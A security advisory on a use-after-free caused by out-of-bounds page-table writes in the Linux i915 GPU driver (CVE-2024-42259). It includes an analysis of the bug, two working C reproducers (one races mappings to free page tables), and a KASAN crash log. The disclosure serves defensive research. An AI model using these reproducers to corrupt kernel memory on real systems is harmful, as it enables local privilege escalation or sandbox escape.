Linux i915 PTE Use-After-Free

2024.09.24
Credit: Jann Horn
Risk: Medium
Local: Yes
Remote: No
CWE: N/A

I found a bug in the i915 code that allows a process with access to a render node (/dev/dri/renderD128) to corrupt kernel memory.

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-08-28.

Summary

vm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limit the size to area->vm_end - {address passed to remap_io_mapping} instead of area->vm_end - area->vm_start.

Bug description

[For people reading this bug report who are not i915 experts: I highly recommend first reading sima's "i915/GEM Crashcourse" at https://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn't have understood what's going on in this code without reading that.]

I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c. PTEs pointing into the GTT MMIO window are written as follows:

    /* Now pin it into the GTT as needed */
    vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,
                                      PIN_MAPPABLE |
                                      PIN_NONBLOCK /* NOWARN */ |
                                      PIN_NOEVICT);
    if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {
        /* Use a partial view if it is bigger than available space */
        struct i915_gtt_view view =
            compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);
        [...]
        vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);
        [...]
    }
    [...]
    /* Finally, remap it using the new GTT offset */
    ret = remap_io_mapping(area,
                           area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),
                           (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,
                           min_t(u64, vma->size, area->vm_end - area->vm_start),
                           &ggtt->iomap);

In the case where the first i915_gem_object_ggtt_pin_ww() call refuses to map the whole object into the GTT MMIO window, for example because the object is too big to fit into the window, a subrange of the object is mapped instead. When this happens and the subrange is not at the start of the VMA, vma->gtt_view.partial.offset is nonzero.

In this case, the size parameter passed to remap_io_mapping() is calculated wrong: It is limited to the size of the VMA (area->vm_end - area->vm_start), but with an address that is higher than where the VMA starts (area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so the end address is only limited to area->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).

When the VMA covers the whole object, this has no bad consequences because of the min_t(); but if the VMA is shorter than the object, PTEs can be written out of bounds.

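The size calculation described above can be checked with plain address arithmetic. The following is a minimal userspace sketch, not kernel code: the helper names (buggy_range, clamped_range, overrun) are hypothetical, 4 KiB pages are assumed, and the 1 MiB partial view size used in the usage note is an assumption about the chunk size rather than something stated in this report.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12                 /* assumption: 4 KiB pages */
#define ONE_MIB (1024ULL * 1024ULL)

/* Virtual address range [start, end) that would receive PTEs. */
struct remap_range {
    uint64_t start;
    uint64_t end;
};

static uint64_t min_u64(uint64_t a, uint64_t b)
{
    return a < b ? a : b;
}

/* Range as computed by the quoted code: size is limited to the VMA length. */
static struct remap_range buggy_range(uint64_t vm_start, uint64_t vm_end,
                                      uint64_t partial_offset_pages,
                                      uint64_t vma_size)
{
    struct remap_range r;

    r.start = vm_start + (partial_offset_pages << PAGE_SHIFT);
    assert(r.start >= vm_start && r.start < vm_end);
    r.end = r.start + min_u64(vma_size, vm_end - vm_start);
    return r;
}

/* Range with the limit from the summary: size is limited to vm_end - start. */
static struct remap_range clamped_range(uint64_t vm_start, uint64_t vm_end,
                                        uint64_t partial_offset_pages,
                                        uint64_t vma_size)
{
    struct remap_range r;

    r.start = vm_start + (partial_offset_pages << PAGE_SHIFT);
    assert(r.start >= vm_start && r.start < vm_end);
    r.end = r.start + min_u64(vma_size, vm_end - r.start);
    return r;
}

/* Number of bytes of the range that lie past the end of the VMA. */
static uint64_t overrun(struct remap_range r, uint64_t vm_end)
{
    return r.end > vm_end ? r.end - vm_end : 0;
}
```

As a usage example under those assumptions: take a mapping of 128 MiB - 0x80000 bytes and a fault in its last page, which is page 32639 of the object. Rounded down to a 256-page (1 MiB) chunk, the partial view starts at page 32512. Calling buggy_range(vm_start, vm_end, 32512, ONE_MIB) then yields a range that ends 0x80000 bytes past vm_end, while clamped_range() with the same arguments ends exactly at vm_end.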
This can be tested with the following reproducer - on my system it causes "BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducer tries to exit:

    // written for a device with Xe Graphics (TGL GT2)
    #define _GNU_SOURCE
    #include <err.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <inttypes.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <drm/i915_drm.h>

    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })

    #define MiB *(1024*1024)

    void poke(volatile char *p) {
      printf("poking %p\n", p);
      *p = 1;
    }

    int main(void) {
      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

      struct drm_i915_gem_create gem_create = {
        .size = 257 MiB /* a bit over half the GGTT aperture size on my machine */
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
      printf("created GEM 0x%x\n", gem_create.handle);

      struct drm_i915_gem_mmap_offset mmap_offset_arg = {
        .handle = gem_create.handle,
        .flags = I915_MMAP_OFFSET_GTT
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
      printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

    #define MAP_SIZE (128 MiB - 0x80000)
      volatile char *map = (volatile char *)SYSCHK(mmap(NULL, MAP_SIZE,
          PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));
      printf("mapped from %p\n", map);
      poke(map + MAP_SIZE - 0x1000);
      poke(map);
      printf("mapped to %p\n", map + MAP_SIZE);
    }

Code history

The current form of the buggy code is from commit c58305af1835 ("drm/i915: Use remap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), but I think back then it was unreachable because the code for constructing a partial view limited the partial view's size based on the VMA bounds back then:

    view.params.partial.size =
        min_t(unsigned int, chunk_size,
              (area->vm_end - area->vm_start) / PAGE_SIZE -
              view.params.partial.offset);

This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partial view against the object not vma", first in v4.11). I suspect the bug became hittable after that point.

Most places in the kernel that install PFNMAP PTEs use helpers like remap_pfn_range() that make sure the passed range fits into the specified VMA; but it looks like i915 doesn't use those because it wants to be able to clobber existing PTEs, which the usual helpers treat as an error. (See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").) i915 instead uses its own helper remap_io_mapping(), which just writes PTEs in the specified virtual address range.

Exploitability

One consequence of this bug is that, because PFNMAP PTEs are written outside the region covered by the VMA, the MM subsystem can't shoot them down when the driver wants to revoke userspace's access to the region. So this could probably be used to gain access to memory that is later mapped into the GTT in the MMIO window - but I don't know enough about i915 to tell whether that is bad or whether shaders always have access to all GTT memory anyway.

Probably another consequence would be that if you had a VMA at the end of the userspace virtual address space, you could get memory mapped into the kernel half of memory? But that probably wouldn't lead to anything overly bad...

The one way I know of to turn this bug into something that is definitely bad is to turn it into page table UAF, like in https://crbug.com/project-zero/2350: When you're only holding the mmap_lock in read mode (like in a page fault handler), page tables that are not needed by any VMA can be freed concurrently. So if we have one GTT-backed VMA directly ahead of a second VMA, and then concurrently trigger a fault in the GTT-backed VMA while unmapping the second VMA, the out-of-bounds page table access off of the first VMA can walk page tables that are concurrently freed.

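The adjacency condition described above can be illustrated with address arithmetic, using the constants from the second reproducer in this report (PGD_BOUNDARY_ADDR = 0x8000000000, MAP_SIZE = 128 MiB - 0x80000). This is only a sketch: the helper names are hypothetical, it assumes x86-64 with 4-level paging (each top-level entry covers 2^39 bytes), and the out-of-bounds range used in the usage note assumes a 1 MiB partial view, which this report does not state.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: x86-64, 4-level paging, so one PGD entry spans 2^39 bytes. */
#define PGDIR_SHIFT 39
#define PTRS_PER_PGD 512

/* Index of the top-level page table entry that translates addr. */
static unsigned pgd_index_of(uint64_t addr)
{
    return (unsigned)((addr >> PGDIR_SHIFT) & (PTRS_PER_PGD - 1));
}

/*
 * Returns nonzero if the PTE write range [start, end) reaches into a
 * top-level entry that the VMA [vm_start, vm_end) itself does not use.
 * Lower-level page tables under such an entry are kept alive only by
 * other VMAs, so they can go away when those VMAs are unmapped.
 */
static int touches_foreign_pgd(uint64_t vm_start, uint64_t vm_end,
                               uint64_t start, uint64_t end)
{
    assert(vm_start < vm_end && start < end);
    return pgd_index_of(start) < pgd_index_of(vm_start) ||
           pgd_index_of(end - 1) > pgd_index_of(vm_end - 1);
}
```

With the left mapping at [0x7ff8080000, 0x8000000000) and a fault in its last page, the assumed write range is [0x8000000000 - 0x80000, 0x8000000000 + 0x80000). touches_foreign_pgd() reports that this range crosses into the next top-level entry, which is where the second thread repeatedly maps and unmaps its own VMA.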
I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAF access) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCU grace periods much shorter at the expense of performance, which makes it easier to detect use-after-free bugs for objects that are RCU-freed), using the following reproducer, running on a system with Xe Graphics (TGL GT2):

    // written for a device with Xe Graphics (TGL GT2)
    #define _GNU_SOURCE
    #include <pthread.h>
    #include <err.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <inttypes.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <drm/i915_drm.h>

    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })

    #define MiB *(1024*1024)

    // virtual address at the boundary between PGD entries
    #define PGD_BOUNDARY_ADDR 0x8000000000
    #define MAP_SIZE (128 MiB - 0x80000)
    #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)

    #define FLIPPER_MAP_SIZE 0x200000

    static void *flipper_thread_fn(void *dummy) {
      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

      struct drm_i915_gem_create gem_create = {
        .size = FLIPPER_MAP_SIZE
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
      printf("flipper created GEM 0x%x\n", gem_create.handle);

      struct drm_i915_gem_mmap_offset mmap_offset_arg = {
        .handle = gem_create.handle,
        .flags = I915_MMAP_OFFSET_GTT
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
      printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

      while (1) {
        SYSCHK(mmap((void*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE,
            PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE,
            fd, mmap_offset_arg.offset));
        SYSCHK(munmap((void*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));
      }
      return NULL;
    }

    int main(void) {
      pthread_t flipper_thread;
      if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))
        errx(1, "pthread_create");

      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));

      struct drm_i915_gem_create gem_create = {
        .size = 257 MiB /* a bit over half the GGTT aperture size on my machine */
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
      printf("created GEM 0x%x\n", gem_create.handle);

      struct drm_i915_gem_mmap_offset mmap_offset_arg = {
        .handle = gem_create.handle,
        .flags = I915_MMAP_OFFSET_GTT
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
      printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

      while (1) {
        SYSCHK(mmap((void*)LEFT_MAPPING_ADDR, MAP_SIZE,
            PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE,
            fd, mmap_offset_arg.offset));
        *(volatile char *)(PGD_BOUNDARY_ADDR - 0x1000);
        SYSCHK(munmap((void*)LEFT_MAPPING_ADDR, MAP_SIZE));
      }
    }

With that, I quickly got a KASAN splat (guess unwind lines removed):

    [ 906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
    [ 906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
    [ 906.819808] ==================================================================
    [ 906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
    [ 906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809
    [ 906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3
    [ 906.819835] Hardware name: [...]
    [ 906.819838] Call Trace:
    [ 906.819839] <TASK>
    [ 906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))
    [ 906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)
    [ 906.819859] kasan_report (mm/kasan/report.c:603)
    [ 906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
    [ 906.819869] __pte_alloc (mm/memory.c:445)
    [ 906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)
    [ 906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)
    [ 906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)
    [ 906.819924] __do_fault (mm/memory.c:4531)
    [ 906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)
    [ 906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)
    [ 906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)
    [ 906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)
    [ 906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)
    [ 906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)
    [ 906.819967] RIP: 0033:0x561a370af516
    [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8
    All code
    ========
       0:   48 83 7d e8 ff          cmpq   $0xffffffffffffffff,-0x18(%rbp)
       5:   75 19                   jne    0x20
       7:   48 8d 05 26 0d 00 00    lea    0xd26(%rip),%rax        # 0xd34
       e:   48 89 c6                mov    %rax,%rsi
      11:   bf 01 00 00 00          mov    $0x1,%edi
      16:   b8 00 00 00 00          mov    $0x0,%eax
      1b:   e8 64 fb ff ff          call   0xfffffffffffffb84
      20:   48 b8 00 f0 ff ff 7f    movabs $0x7ffffff000,%rax
      27:   00 00 00
      2a:*  0f b6 00                movzbl (%rax),%eax     <-- trapping instruction
      2d:   be 00 00 f8 07          mov    $0x7f80000,%esi
      32:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax
      39:   00 00 00
      3c:   48 89 c7                mov    %rax,%rdi
      3f:   e8                      .byte 0xe8

    Code starting with the faulting instruction
    ===========================================
       0:   0f b6 00                movzbl (%rax),%eax
       3:   be 00 00 f8 07          mov    $0x7f80000,%esi
       8:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax
       f:   00 00 00
      12:   48 89 c7                mov    %rax,%rdi
      15:   e8                      .byte 0xe8
    [ 906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213
    [ 906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3
    [ 906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000
    [ 906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000
    [ 906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000
    [ 906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020
    [ 906.819987] </TASK>

    [ 906.819990] The buggy address belongs to the physical page:
    [ 906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919
    [ 906.819994] flags: 0x4000000000000000(zone=1)
    [ 906.819997] page_type: 0xffffffff()
    [ 906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000
    [ 906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000
    [ 906.820004] page dumped because: kasan: bad access detected

    [ 906.820006] Memory state around the buggy address:
    [ 906.820008]  ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 906.820010]  ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 906.820013]                    ^
    [ 906.820014]  ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 906.820016]  ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 906.820017] ==================================================================

This bug is probably not very interesting on Linux servers, since access to the render node is typically only granted to UIDs who have locally signed in to a machine; but it is probably relevant for things like ChromeOS, and maybe also for escaping from some types of sandboxed desktop applications?

Related CVE Number: CVE-2024-42259.

Found by: jannh@google.com

